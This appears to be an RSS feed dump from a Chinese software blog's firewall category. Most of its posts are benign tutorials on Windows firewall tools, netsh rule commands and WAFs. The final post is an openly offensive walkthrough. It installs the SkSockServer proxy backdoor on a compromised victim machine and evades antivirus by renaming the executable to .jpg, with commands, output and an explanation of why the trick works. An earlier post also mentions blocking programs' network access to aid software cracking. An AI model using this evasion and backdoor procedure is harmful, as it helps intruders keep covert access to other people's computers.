防火墙 – 嗨软 https://ihacksoft.com/archive 分享最好用的常用软件 Tue, 22 Nov 2022 02:41:09 +0000 zh-CN hourly 1 https://wordpress.org/?v=4.9.26 Windows Firewall Control 绿色版下载+详细使用方法 https://ihacksoft.com/archive/999.html https://ihacksoft.com/archive/999.html#respond Wed, 15 Jan 2020 02:07:21 +0000 https://ihacksoft.com/?p=1728   很多程序我们并不希望它在后台联网,有的是为了防止其偷偷上传数据,有的是为了软件自动更新,还有的为了本地注册破解。不管出于什么原因,阻止程序连网必须用到防火墙。其实系统自带的 Windows 防火墙很强大,但是却很少有人使用。如果是因为配置复杂的话,这里推荐 Windows Firewall Control,简称 WFC。本文提供最新绿色版及官方原版的下载,如果你要放U盘里随处携带,推荐后者,否则,安装官方原版。

  Windows Firewall Control 是一个功能强大的工具,可扩展 Windows 防火墙的功能并提供新的额外功能,从而使 Windows 防火墙更加好用。它运行在系统托盘中,使用户可以轻松地控制本机防火墙出入规则。

  程序下载后,打开 Options,在右侧的 User interface language 一栏选择“简体中文”。这样工具的操作界面就变成简体中文的了。

  首先介绍一下各个过滤级别。过滤级别是指定哪些连接是要禁止的,哪些是允许的:

Windows Firewall Control

一、高过滤

  禁止所有出站和入站连接。此配置将禁止所有从您的电脑发出的连接及到您的电脑连接尝试。

二、中过滤(推荐)

  禁止与规则不匹配的出站连接,只有那些符合允许规则的程序才允许连接。

三、低过滤

  允许与规则不匹配的出站连接,只有那些符合禁止规则的程序才会被禁止。

四、无过滤

  关闭 Windows 防火墙。请避免使用此设置,除非您有另一个防火墙在运行。

  双击系统托盘图标打开软件的配置窗口,点击左下角的“管理Windows防火墙规则”这项。接着在新窗口点击“创建新规则”中的“增加阻止程序”按钮,在弹出的对话框中选择要禁止的程序文件。程序文件选择完成以后,该工具就可以马上创建一个新的网络规则,但是操作步骤相比于系统自带防火墙却大大的得到了简化。

Windows Firewall Control

  官方原版下载地址:https://www.binisoft.org/download/wfc6setup.exe

Note: There is a file embedded within this post, please visit this post to download the file. ]]>
https://ihacksoft.com/archive/999.html/feed 0
创建系统防火墙开关的快捷方式 https://ihacksoft.com/archive/899.html https://ihacksoft.com/archive/899.html#respond Wed, 20 Nov 2019 02:48:29 +0000 https://ihacksoft.com/?p=1628   Windows防火墙在不同的环境中有不同的开关需求。当我们连接到公共网络(如图书馆或咖啡厅)时,可能需要阻止所有传入连接;而如果是在家中等安全环境中,则不需要有这么严苛的设置。如果经常需要禁用或启用 Windows 防火墙,可为其创建快捷方式,代替通过控制面板的麻烦操作。

  如果要创建禁用防火墙的快捷方式,在创建快捷方式的对象框输入如下命令:

netsh firewall set opmode disable

将快捷方式命名为“禁用防火墙”。

  反之,若要创建开启防火墙的快捷方式,则输入如下命令即可:

netsh firewall set opmode enable

将快捷方式命名为“启动防火墙”。

  这样,就可以通过这两个图标轻松地开关防火墙了。

]]>
https://ihacksoft.com/archive/899.html/feed 0
并发连接数和会话数的区别 https://ihacksoft.com/archive/687.html https://ihacksoft.com/archive/687.html#comments Mon, 03 Jun 2019 12:30:40 +0000 https://ihacksoft.com/?p=1416   今天听到别人在讨论网络安全设备深信服 VPN 的并发连接数,深信服连接数比较贵,然后客户在问深信服技术:最大并发数有限制,会话数应该是无限制的吧?当时就在想,两者的区别是什么?

  最大并发连接数:是防火墙(或者其它安全设备)能够同时处理的点对点连接的最大数目,如果是深信服的 VPN 设备,最大并发数就是可以同时连接的 VPN 用户数。

  最大会话数:用户通过防火墙上网,要打开很多个 Web 页面或连接各种网络应用所发生的状态就叫做会话,一个连接就是一个会话。

]]>
https://ihacksoft.com/archive/687.html/feed 1
Web 防火墙(WAF)是什么?和传统防火墙区别是什么? https://ihacksoft.com/archive/669.html https://ihacksoft.com/archive/669.html#respond Wed, 22 May 2019 09:30:44 +0000 https://ihacksoft.com/?p=1398   昨天在机房可能是第一次接触到 WAF 设备,不是很懂,问了下主要是为了网页防篡改。回来后找些资料赶紧学习下。WAF,全称为:Web Application Firewall,即 Web 应用防火墙。对此,维基百科是这么解释的:Web应用程序防火墙过滤,监视和阻止与Web应用程序之间的HTTP流量。WAF与常规防火墙的区别在于,WAF能够过滤特定Web应用程序的内容,而常规防火墙则充当服务器之间的安全门。通过检查HTTP流量,它可以防止源自Web应用程序安全漏洞的攻击,例如SQL注入、跨站点脚本,文件包含和安全性错误配置。

Web 防火墙(WAF)

  WAF的出现是由于传统防火墙无法对应用层的攻击进行有效抵抗,并且IPS也无法从根本上防护应用层的攻击。因此出现了保护Web应用安全的Web应用防火墙系统(简称“WAF”)。WAF是一种基础的安全保护模块,通过特征提取和分块检索技术进行特征匹配,主要针对 HTTP 访问的 Web 程序保护。WAF部署在Web应用程序前面,在用户请求到达 Web 服务器前对用户请求进行扫描和过滤,分析并校验每个用户请求的网络包,确保每个用户请求有效且安全,对无效或有攻击行为的请求进行阻断或隔离。

  WAF主要提供对Web应用层数据的解析,对不同的编码方式做强制多重转换还原为攻击明文,把变形后的字符组合后再分析,能够较好的抵御来自Web层的组合攻击主要抵御算法为基于上下文的语义分析。

  WAF是随着目前Web一个用的日益流行,实现Web应用防护的一类新型安全产品,它与传统的IPS在某些防护效果上有功能重叠的部分(例如防止SQL注入攻击),但两款产品在工作原理、市场定位、功能特点、部署模式等方面存在显著差异。可以说,WAF防火墙是对运营Web应用的具备一定防护能力的网络环境的Web攻击防护能力的必要增强。IPS和IDS是该网络环境必备的基础设备。

  Web防火墙,主要是对Web特有入侵方式的加强防护,如DDOS防护、SQL注入、XML注入、XSS等。由于是应用层而非网络层的入侵,从技术角度都应该称为Web IPS,而不是Web防火墙。这里之所以叫做Web防火墙,是因为大家比较好理解,业界流行的称呼而已。由于重点是防SQL注入,也有人称为SQL防火墙。

  Web防火墙产品部署在Web服务器的前面,串行接入,不仅在硬件性能上要求高,而且不能影响Web服务,所以HA功能、Bypass功能都是必须的,而且还要与负载均衡、Web Cache等Web服务器前的常见的产品协调部署。

Web 防火墙(WAF)

  Web防火墙的主要技术的对入侵的检测能力,尤其是对Web服务入侵的检测,不同的厂家技术差别很大,不能以厂家特征库大小来衡量,主要的还是看测试效果,从厂家技术特点来说,有下面几种方式:

  代理服务:代理方式本身就是一种安全网关,基于会话的双向代理,中断了用户与服务器的直接连接,适用于各种加密协议,这也是Web的Cache应用中最常用的技术。代理方式防止了入侵者的直接进入,对DDOS攻击可以抑制,对非预料的“特别”行为也有所抑制。Netcontinuum(梭子鱼)公司的WAF就是这种技术的代表。

  特征识别:识别出入侵者是防护他的前提。特征就是攻击者的“指纹”,如缓冲区溢出时的Shellcode,SQL注入中常见的“真表达(1=1)”…应用信息没有“标准”,但每个软件、行为都有自己的特有属性,病毒与蠕虫的识别就采用此方式,麻烦的就是每种攻击都自己的特征,数量比较庞大,多了也容易相象,误报的可能性也大。虽然目前恶意代码的特征指数型地增长,安全界声言要淘汰此项技术,但目前应用层的识别还没有特别好的方式。

  算法识别:特征识别有缺点,人们在寻求新的方式。对攻击类型进行归类,相同类的特征进行模式化,不再是单个特征的比较,算法识别有些类似模式识别,但对攻击方式依赖性很强,如SQL注入、DDOS、XSS等都开发了相应的识别算法。算法识别是进行语义理解,而不是靠“长相”识别。

  模式匹配:是IDS中“古老”的技术,把攻击行为归纳成一定模式,匹配后能确定是入侵行为,当然模式的定义有很深的学问,各厂家都隐秘为“专利”。协议模式是其中简单的,是按标准协议的规程来定义模式;行为模式就复杂一些,

  Web防火墙最大的挑战是识别率,这并不是一个容易测量的指标,因为漏网进去的入侵者,并非都大肆张扬,比如给网页挂马,你很难察觉进来的是那一个,不知道当然也无法统计。对于已知的攻击方式,可以谈识别率;对未知的攻击方式,你也只好等他自己“跳”出来才知道。

Web 防火墙(WAF)

WAF与网络防火墙的区别

  网络防火墙作为访问控制设备,主要工作在OSI模型三、四层,基于IP报文进行检测。只是对端口做限制,对TCP协议做封堵。其产品设计无需理解HTTP会话,也就决定了无法理解Web应用程序语言如HTML、SQL语言。因此,它不可能对HTTP通讯进行输入验证或攻击规则分析。针对Web网站的恶意攻击绝大部分都将封装为HTTP请求,从80或443端口顺利通过防火墙检测。

  一些定位比较综合、提供丰富功能的防火墙,也具备一定程度的应用层防御能力,如能根据TCP会话异常性及攻击特征阻止网络层的攻击,通过IP分拆和组合也能判断是否有攻击隐藏在多个数据包中,但从根本上说他仍然无法理解HTTP会话,难以应对如SQL注入、跨站脚本、cookie窃取、网页篡改等应用层攻击。

  Web应用防火墙能在应用层理解分析HTTP会话,因此能有效的防止各类应用层攻击,同时他向下兼容,具备网络防火墙的功能。

  传统防火墙可保护服务器之间的信息流,而Web应用程序防火墙则能够过滤特定Web应用程序的流量。网络防火墙和Web应用程序防火墙是互补的,可以协同工作。

  传统的安全方法包括网络防火墙,入侵检测系统(IDS)和入侵防御系统(IPS)。它们可有效阻止开放系统互连(OSI)模型下端(L3-L4)周边的不良L3-L4流量。传统防火墙无法检测Web应用程序中的攻击,因为它们不了解在OSI模型的第7层发生的超文本传输​​协议(HTTP)。它们还仅允许从HTTP服务器发送和接收请求的网页的端口打开或关闭。这就是为什么Web应用程序防火墙可以有效防止SQL注入,会话劫持和跨站点脚本(XSS)等攻击。

]]>
https://ihacksoft.com/archive/669.html/feed 0
人人都会用的防火墙 – SimpleWall 绿色版下载及使用方法 https://ihacksoft.com/archive/431.html https://ihacksoft.com/archive/431.html#respond Sat, 29 Sep 2018 09:10:12 +0000 https://ihacksoft.com/?p=441   Windows 自带防火墙其实很强大,可是对于非计算机专业的普通用户来讲,使用起来还是会有一定的难度。本文介绍一款小巧、简单、易用的防火墙软件,相信人人都能使用。刚刚下载下来试用了一番,做了个测试,将 QQ 加入到黑名单并开启过滤,等几秒钟时间后,果然,QQ 就下线了。下面简单介绍下使用方法。

添加允许访问的程序或进程

  首先访问 SimpleWall 防火墙的官方网站(https://www.henrypp.org/),在左侧列表中找到这款软件的名称链接后,点击它,在右侧窗口中就可以看到它的最新版本。官方网站提供了软件的安装版以及便携版两个版本,用户可以根据自己的需要来进行选择。我这里直接选择经色便携版,解压以后就能直接使用了。和其他的防火墙软件一样,Simplewall也是通过创建规则来进行管理操作的,而且用户可以选择白名单或者黑名单两种不同的方式来进行管理。

  点击“设置”菜单后选择“过滤模式”命令,就可以将默认的白名单切换成黑名单的模式。规则里面无论是IP地址还是端口,连续的都可以利用“-”进行设置,不连续的则用分号进行分隔。

  软件在默认的状态下采用的是白名单制度,也就是说加入到白名单中的软件程序可以正常地进行网络访问,没有加入到白名单中的程序则无法进行网络连接操作。比如在Simplewall窗口列表中点击鼠标右键,在弹出的菜单中选择“添加”命令中的“添加文件”命令。然后在弹出的对话框中选择允许网络访问的软件程序,点击“打开”按钮后就可以添加到软件窗口的列表中。但是添加的软件程序默认被添加到“阻止的程序”这一项里面,现在我们在其中勾选该软件程序后就被移动到“允许的程序”里面。这样这款软件程序就可以进行正常的网络访问了。

封堵系统的重要端口

  除了控制好系统中的软件程序以外,对系统端口的管理也非常重要,因为很多病毒都是利用系统的端口来进行入侵的。那么利用这款软件如何进行系统端口的封堵操作呢?首先点击“设置”菜单中的“设置”命令,在弹出的对话框中选择左侧列表中的“自定义规则”命令。然后在右侧列表中点击鼠标右键,选择“添加”命令后就可以开始自定义规则的创建操作。

  我们首先自定义一个自己清楚的规则名称,接着在“规则Local”选项中设置要进行拦截的端口。由于我们主要是拦截外部对本地端口的攻击,所以在这里设置为“127.0.0.1:135; 127.0.0.1:139;127.0.0.1:445;”,它表示对127.0.0.1的135、139、445等这几个端口进行操作。接着在“方向”列表中选择“入站”,在“操作”列表中选择“阻止”,点击“应用”,最后返回到列表中勾选该规则,就可以封堵这几个端口了。

]]>
https://ihacksoft.com/archive/431.html/feed 0
64位的系统我到底是安装32位的软件还是64位的? https://ihacksoft.com/archive/282.html https://ihacksoft.com/archive/282.html#respond Mon, 23 Apr 2018 02:14:35 +0000 https://ihacksoft.com/?p=292   朋友新买了一台笔记本电脑,8G内存,所以里面安装的自然也是 Windows 64位的的操作系统,然后在安装 Photoshop 的时候问题来了,我到底是安装32位还是64位的版本?

  通常情况下64位的操作系统还是建议使用64位的软件,这样可以更好地提升软件运行的效率。但是需要提醒的是,有的软件需要通过安装第三方的插件才能拓展功能,但是这些插件往往只有32位的版本。如果这时安装64位的软件就和这个插件不兼容,此种情况还是只能使用32位的版本。有的软件在安装的时候会自动判断系统的版本,并且根据结果安装它认为合适的版本。

]]>
https://ihacksoft.com/archive/282.html/feed 0
你会用吗?Windows 10 防火墙其实简单又强大! https://ihacksoft.com/archive/157.html https://ihacksoft.com/archive/157.html#respond Wed, 14 Jun 2017 12:58:13 +0000 https://ihacksoft.com/?p=167   大家知道 Windows 10 自带的防火墙功能已经足够强大,不过其设置也较为复杂。特别是对新手来说,一些专业术语更是让人似懂非懂。如何让大家都可以简单高效地玩转Windows 10防火墙设置呢?

Windows 10 防火墙

  一、入门:拖曳完成设置 — 使用 Firewall App Blocker 限制联网

  在日常操作中,我们经常需要对某一程序联网进行控制,比如在Windows 10平板使用计费的移动WLAN联网,现在需要节省流量限制QQ、微信等程序联网。使用Windows 10防火墙当然可以完成限制,不过设置前我们得了解出站/进站规则这术语,而且还得学会怎样设置规则。觉得有些头大?现在借助Firewall App Blocker,我们只要动动手指就可以完成对程序的联网限制。

  启动程序后点击“+”,然后选中QQ安装位置将其添加到列表(也可以直接拖动限制联网程序到列表),这样选择的程序就无法连接网络了,要恢复设置则点击“-”删除。
  完成上述的设置后再启动QQ,此时在登录界面就会提示登录超时,检查本机防火墙的提示,QQ已经被防火墙成功拦截。

  Firewall App Blocker并不会占用系统资源,实际上它就是帮助你配置Windows防火墙,只是一个第三方工具,本身不需要运行。在启用程序限制后点击“防火墙设置”,打开系统自带防火墙设置后可以看到,系统内已经增加了一条禁止QQ联网的出站规则。程序联网限制实际上是通过调用系统防火墙实现,但是极大地降低了用户使用难度。

  二、进阶:简捷高效——使用命令行快速配置防火墙

  由于Windows 10防火墙默认设置比较繁琐,对于很多高手来说还可以借助系统自带命令行实现更为高效的设置。Windows 10自带的netsh命令可以对防火墙进行快速配置。

  快速创建规则。Windows 10防火墙一个重要功能就是用户可以自行设置规则来实现更强的安全防护功能。如我们可以在防火墙设置规则来对特定端口进行关闭或开启,不过系统防火墙端口设置比较麻烦,现在借助netsh命令,一条指令即可轻松实现。假设现在需要创建一个规则允许本地TCP的3389端口对外开放,以管理员身份启动命令提示符后输入“netsh advfirewall firewall add rule name=cfan dir=in action=allow protocol=TCP localport=3389”,这样在防火墙就创建了一个名为“cfan”的规则,这个规则允许开放本地3389端口。

  创建规则后打开Windows 10防火墙高级设置,展开“监视→防火墙”,在右侧就可以看到上述命令创建的规则和详细属性。

  三、重裝不闹心 导出/导入配置规则

  平时好不容易设置好防火墙各种规则保护系统,可是Windows 10使用一段时间后总会出现各种问题需要重装系统。重装后还要再重新设置各种规则?NO!现在可以通过命令行快速导出/导入防火墙配置。

  首先在系统正常的时候启动命令提示符,输入:
netsh advfirewall export "d:\advfirewallpolicy.pol",
该命令会将防火墙当前的所有配置导出到"d:\advfirewallpolicy.pol"中保存。

  这样当我们重装系统完成后再次运行命令提示符,输入netsh advfirewall import "d:\advfirewallpolicy.pol",即可快速将导出的各种配置导入到新系统中。当然对于同样版本的系统(如都是Windows 10 64位系统),我们可以将该配置文件共享给其他好友,让大家一起使用我们所设置的规则。

  四、更多命令行操作

  netsh命令还支持很多的快捷操作,防火墙默认是按照专用网络、公共网络分别进行配置的,如果要在这些网络中更改不同设置,默认就需要分别进入修改。现在可以借助命令行一步完成所有更改。比如要在所有配置文件中设置默认阻挡入站并允许出站通信,只要输入“netsh advfirewall set allprofiles firewallpolicy blockinbound,allowoutbound”一条命令即可,其中blockinbound,
allowoutbound分别对应入站和出站通信,还可以根据自己的实际需要添加更多参数完成批量设置。

  如果防火墙设置出现了紊乱需要恢复初始设置,以管理员身份启动命令提示符后输入
“netsh advfirewall reset”,
即可重新设置防火墙策略到默认策略状态。netsh advfirewall更多的使用可以参考其帮助。

]]>
https://ihacksoft.com/archive/157.html/feed 0
巧妙利用扩展名让我们的木马躲过杀毒软件与防火墙 https://ihacksoft.com/archive/1137.html https://ihacksoft.com/archive/1137.html#respond Wed, 16 Dec 2009 01:33:32 +0000 https://ihacksoft.com/?p=1866 E:\>SkSockServer -install
显示“拒绝访问”。
原因是被肉鸡上的杀毒软件拦截了。 ]]>
我在肉鸡CMD下安装一个代理跳板后门。

执行:
E:\>SkSockServer -install

显示“拒绝访问”。
原因是被肉鸡上的杀毒软件拦截了!

怎么办?如何绕过杀毒软件或者防火墙?我把SkSockServer.exe改成SkSockServer.jpg,然后执行。

E:\>SkSockServer.jpg -install

Snake SockProxy Service installed.
  
E:\>SkSockServer.jpg -config port 1800

The Port value have set to 1800
  
E:\>SkSockServer.jpg -config starttype 2

The New StartType have set to 2 -- Auto

E:\>net start skserver
  
Snake SockProxy Service 服务正在启动 .
  
nake SockProxy Service 服务已经启动成功。

Ok!成功! 
  
现在我们不怕杀毒软件了!而其他的在命令行执行的程序也可以用这种方法。
  
原理讲解:

其实原理很简单,我们利用了cmd判定文件类型的方法。在CMD中,系统首先判定文件的类型是否是执行文件,判定方法不是文件扩展名,而是文件头的PE段。如是执行文件,则执行它。如不是,再根据相应的关联启动相应程序。如没有输入扩展名,则系统将默认扩展名为BAT,EXE,COM,依次判定。也就是说,程序更改了扩展名后,只有cmd.exe能“认”出它来,因为cmd不是根据扩展名来判定文件类型的。而Windows是靠扩展名来判定文件类型的。这样,我们就可以骗过Windows和杀毒软件。

]]>
https://ihacksoft.com/archive/1137.html/feed 0